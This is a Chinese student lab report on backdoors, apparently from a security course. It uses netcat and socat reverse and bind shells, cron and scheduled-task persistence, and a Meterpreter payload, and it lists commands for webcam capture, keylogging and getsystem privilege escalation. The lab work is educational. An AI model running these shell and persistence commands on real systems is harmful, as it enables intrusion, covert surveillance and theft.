基础问题

(1)例举你能想到的一个后门进入到你系统中的可能方式?

计算机安装的某些软件自己就带有后门,在用户不知情的情况下安装好这个软件之后后门就进入了计算机系统。

或者别人通过一些手段,在你不知情的情况下将后门安装进你的电脑。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

通过服务机开启一些指令来将其开启。

定时启动。定好了启动的时间之后后门在特定时间自动启动

开机自启动

用户点击后启动

(3)Meterpreter有哪些给你映像深刻的功能?

获取摄像头行为,感觉自己的生活有可能被人随时监视,真的可怕!

(4)如何发现自己有系统有没有被安装后门?

应该多多用杀毒软件进行杀毒,争取做的日日杀毒,然而有些杀毒软件也并不完善,下载那些表完善杀毒软件,并且规范自己的上网行为,不乱点,不乱下载。。。

实验过程记录

一、使用netcat获取主机操作Shell,cron启动

(一)windows获取linux的shell

1.查看主机IP

2.查看虚拟机的IP

3.主机在ncat文件目录下启动监听

4.虚拟机连接主机

5.我们就在windows下获得一个linux shell,可以运行linux的指令

6.因为linux中的指令是nc 172.20.10.10 5219 -e /bin/sh,所以我们可以在Windows下面运行linux的指令并获取信息,但是我们并不能进行通信,若想进行通信可在linux下输入指令nc 172.20.10.10 5219

(二)linux获取windows的shell

1.linux启动监听

2.Windows连接linux

3.我们可以在linux中看到提示

(三)启动cron

1.在linux中输入crontab -e命令来增加定时任务。这条定时任务就是在特定的时间主机和虚拟机会产生连接,在主机上会获得一个shell。我设定的是在每个小时的第40分钟可以进行连接。

2.在第35分钟之前无法输入命令,等到35分钟时才可以输入命令

二、使用socat获取主机操作Shell, 任务计划启动

socat的基本功能就是建立两个双向的字节流,数据就在其间传输,参数address就是代表了其中的一个方向。所谓流,代表了数据的流向,而数据则可以有许多不同的类型,命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。

使用socat获取主机操作Shell

1.打开计算机管理工具里的任务计划程序,创建一个新的任务

2.对触发器进行设定,在程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5219 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5219,同时把cmd.exe的stderr重定向到stdout上


3.再对操作进行设定

4.启动任务,在虚拟机中连接主机,将主机锁定后重新打开,获得shell

三、使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1.在linux下生成后门程序

2.在linux下输入命令ncat.exe -lv 5219 > 5219.exe传输这个后门程序

3.在主机上接收这个后门程序

4.在linux下输入msfconsole进入msf

5.在虚拟机中设置LHOST为虚拟机IP,端口为5210,开启msf监听

6.在主机上运行刚刚接收的后门程序,linux获得win的shell,可对主机执行操作

四、使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

1.获取目标主机当前屏幕界面

使用如下命令:

还有许多别的命令:

  • 使用record_mic指令可以截获一段音频。
    image

  • 使用webcam_snap指令可以使用摄像头进行拍照。

  • 使用webcam_stream指令可以使用摄像头进行录像。
    这两项无法做出,显示错误,可能是我从来没用过摄像头的缘故。。。

  • 使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录。

  • 使用getsystem指令进行提权,如图所示,提权成功

实践总结

1.在启动cron这一步时我遇到了一点小问题,我的主机不能执行虚拟机上的命令,试了很多次都失败了,后来才发现计算机上的时间和正确的时间不一样,之前我一直按照虚拟机的时间进行操作,然而在这一次我按照计算机上的时间操作就成功了。

2.在任务计划启动那块一开始我创建完任务之后没有启动任务,导致虚拟机这边获取不到win的shell,将任务启动之后就顺利获得了shell

3,经过这次实践过后觉得自己的计算机并不是百毒不侵的,要提高自己的安全防范意识,要经常进行病毒查杀。

4.之前因为自己的疏忽忘记关防火墙,导致在win10系统内一直无法激活那个后门程序,后来换了xpattacker靶机也不可以,提示什么“不是win32文件”。之后关闭防火墙把后门文件放入自己的主机win10,导致win10系统变得巨慢,开机还有上网都很慢,但是查杀的时候除了自己的病毒也没有别的木马病毒,之后做完实验立马把后门文件删除,重启之后电脑就恢复正常了,有个疑问,为啥自己做的后门病毒也会是电脑变慢?明明自己啥都没做啊QAQ?